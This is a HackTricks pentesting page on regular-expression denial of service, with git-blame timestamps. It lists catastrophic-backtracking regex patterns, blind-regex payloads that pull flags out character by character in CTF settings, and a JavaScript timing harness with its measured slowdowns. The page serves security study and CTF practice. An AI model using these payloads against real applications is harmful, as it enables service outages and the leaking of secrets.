hacktricks/pentesting-web/regular-expression-denial-of-service-redos.md

108 lines
6.3 KiB
Markdown
Raw Normal View History

2022-06-28 21:57:30 +00:00
# Regular expression Denial of Service - ReDoS
2022-04-28 16:01:33 +00:00
<details>
2024-01-10 10:21:44 +00:00
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-01-10 10:21:44 +00:00
Other ways to support HackTricks:
2022-04-28 16:01:33 +00:00
2024-01-10 10:21:44 +00:00
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>
2024-02-03 16:02:14 +00:00
# Regular Expression Denial of Service (ReDoS)
2021-01-26 13:51:43 +00:00
2024-02-06 03:10:38 +00:00
A **Regular Expression Denial of Service (ReDoS)** happens when someone takes advantage of weaknesses in how regular expressions (a way to search and match patterns in text) work. Sometimes, when regular expressions are used, they can become very slow, especially if the piece of text they're working with gets larger. This slowness can get so bad that it grows really fast with even small increases in the text size. Attackers can use this problem to make a program that uses regular expressions stop working properly for a long time.
2021-01-26 13:53:03 +00:00
2024-02-03 16:02:14 +00:00
## The Problematic Regex Naïve Algorithm
2021-01-26 13:51:43 +00:00
2024-02-03 16:02:14 +00:00
**Check the details in [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
2021-01-26 13:51:43 +00:00
2024-02-03 16:02:14 +00:00
## Evil Regexes <a href="#evil-regexes" id="evil-regexes"></a>
2021-01-26 13:51:43 +00:00
2024-02-06 03:10:38 +00:00
An evil regular expression pattern is that one that can **get stuck on crafted input causing a DoS**. Evil regex patterns typically contain grouping with repetition and repetition or alternation with overlapping inside the repeated group. Some examples of evil patterns include:
2021-01-26 13:51:43 +00:00
2024-02-03 16:02:14 +00:00
* (a+)+
* ([a-zA-Z]+)*
* (a|aa)+
* (a|a?)+
* (.*a){x} for x > 10
2021-01-26 13:51:43 +00:00
2024-02-06 03:10:38 +00:00
All those are vulnerable to the input `aaaaaaaaaaaaaaaaaaaaaaaa!`.
2021-01-26 13:51:43 +00:00
2022-06-28 21:57:30 +00:00
## ReDoS Payloads
2022-04-05 22:13:36 +00:00
2022-06-28 21:57:30 +00:00
### String Exfiltration via ReDoS
2022-04-05 22:13:36 +00:00
In a CTF (or bug bounty) maybe you **control the Regex a sensitive information (the flag) is matched with**. Then, if might be useful to make the **page freeze (timeout or longer processing time)** if the a **Regex matched** and **not if it didn't**. This way you will be able to **exfiltrate** the string **char by char**:
* In [**this post**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) you can find this ReDoS rule: `^(?=<flag>)((.*)*)*salt$`
* Example: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
* In [**this writeup**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) you can find this one:`<flag>(((((((.*)*)*)*)*)*)*)!`
2022-06-28 21:57:30 +00:00
* In [**this writeup**](https://ctftime.org/writeup/25869) he used: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
2022-04-05 22:13:36 +00:00
2022-06-28 21:57:30 +00:00
### ReDoS Controlling Input and Regex
2022-04-05 22:13:36 +00:00
The following are **ReDoS** examples where you **control** both the **input** and the **regex**:
2021-01-26 13:51:43 +00:00
```javascript
function check_time_regexp(regexp, text){
var t0 = new Date().getTime();;
new RegExp(regexp).test(text);
var t1 = new Date().getTime();;
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}
2022-04-05 22:13:36 +00:00
// This payloads work because the input has several "a"s
2021-01-26 13:51:43 +00:00
[
// "((a+)+)+$", //Eternal,
// "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$", //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))
/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/
```
2022-06-28 21:57:30 +00:00
## Tools
2021-04-16 09:25:21 +00:00
2022-04-27 12:34:57 +00:00
* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
* [https://devina.io/redos-checker](https://devina.io/redos-checker)
2022-04-28 16:01:33 +00:00
2024-02-03 16:02:14 +00:00
# References
* [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
2024-02-06 03:10:38 +00:00
* [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
* [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
* [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
2024-02-03 16:02:14 +00:00
2022-04-28 16:01:33 +00:00
<details>
2024-01-10 10:21:44 +00:00
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-01-10 10:21:44 +00:00
Other ways to support HackTricks:
2022-04-28 16:01:33 +00:00
2024-01-10 10:21:44 +00:00
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>